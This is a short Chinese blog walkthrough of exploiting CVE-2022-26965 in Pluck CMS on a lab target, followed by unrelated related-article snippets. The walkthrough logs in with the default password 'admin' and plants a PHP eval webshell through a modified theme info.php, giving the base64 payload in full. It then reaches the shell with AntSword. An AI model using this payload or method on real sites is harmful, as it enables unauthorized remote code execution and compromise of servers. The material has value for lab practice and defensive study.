CVE-2022-26965靶机渗透

embedded/2024/10/21 2:14:11/

开启环境

进入环境

使用弱口令admin登录

利用cms主题构造木马

需要将主题中的info.php文件修改,再打包成zip再上传,通过网络搜索找到Github中的Pluck CMS,进入后随便下载任一主题

https://github.com/search?q=Pluck+CMS&type=repositories

base64编码一句话木马

<?php @eval($_POST["cmd"]) ?>

修改info.php文件

<?php
file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSkgPz4='));
?>

保存

压缩为zip文件

上传zip文件

上传成功

蚁剑连接

​好小子,离成功又近一步!!!


http://www.ppmy.cn/embedded/129151.html

相关文章

mongodb的相关关键字说明

以下是MongoDB中一些数据库相关的关键字说明&#xff1a; 1. 数据库&#xff08;Database&#xff09; 概念 数据库是MongoDB中数据存储的最高层级容器&#xff0c;类似于关系型数据库中的数据库概念。一个MongoDB服务器实例可以包含多个数据库&#xff0c;每个数据库可以有自…

【Linux】进程状态

文章目录 进程三状态转换Linux进程状态R状态S状态D状态如何暂停进程t状态x状态Z状态 总结 进程三状态转换 新建态&#xff1a; 操作系统已经分配了资源给进程了。 就绪态&#xff1a; 已经具备了执行的所有必有的条件&#xff0c;但是由于各种原因&#xff0c;暂时无法运行&…

主流网络设备的组网方式和配置命令

在现代网络中&#xff0c;配置和管理主流网络设备是网络管理员和工程师必须掌握的技能。本文将详细介绍主流网络设备的组网方式及其常用配置命令&#xff0c;涵盖路由器、交换机、防火墙等设备。 一、路由器 1. 组网方式 路由器是连接不同网络段的重要设备&#xff0c;其主要功…

SpringBoot +Vue3前后端分离项目入门基础实例二

项目说明 项项目名称使用框架说明后端项目springboot_vue_element_demoSpringBoot + MyBatis-plus + MySQL完成基本的增删改查操作API前端项目vue-projectVue3 + ElementUI plus + axios界面展示,调用后端API项目文档目录 SpringBoot +Vue3前后端分离项目入门基础实例一 Spri…

08 算法评价标准:空间复杂度(大 O 渐进表示法、常见空间复杂度及案例分析、空间换时间)

目录 1 空间复杂度的理解 1.1 基本概念 1.2 大 O 渐进表示法 1.3 空间复杂度的意义 2 常见的空间复杂度 3 空间复杂度案例分析 3.1 常数级空间复杂度 O(1) 3.2 线性空间复杂度 O(n) 3.3 递归函数的空间复杂度 3.4 平方级空间复杂度 O(n^2) 4 空间复杂度与时间复杂度…

010_django基于spark的电力能耗数据分析系统的设计与实现2024_s120960s

目录 系统展示 开发背景 代码实现 项目案例 获取源码 博主介绍&#xff1a;CodeMentor毕业设计领航者、全网关注者30W群落&#xff0c;InfoQ特邀专栏作家、技术博客领航者、InfoQ新星培育计划导师、Web开发领域杰出贡献者&#xff0c;博客领航之星、开发者头条/腾讯云/AW…

HALCON数据结构之矩阵

1.1矩阵的创建、设置和访问 *1、矩阵的创建*创建单位矩阵 create_matrix (3, 3, identity, MatrixID1)*创建一个全是常数的矩阵 create_matrix (3, 3, 7, MatrixID2)*为主对角线上的所有元素都被设置为参数Value的值 create_matrix (3, 3, [3,7,1], MatrixID3)*为矩阵的所有元…

模型的部署:服务端与客户端建立连接(Flask)

目录 一、服务端部署&#xff08;使用Flask&#xff09; 1.安装Flask 2.加载模型&#xff08;这里以识别图片的类型模型为例&#xff09; 3.定义API端点 4.运行Flask应用 二、客户端请求 1.安装HTTP客户端库 2.发送请求 请求成功示例&#xff1a; 监控与日志 总结 在…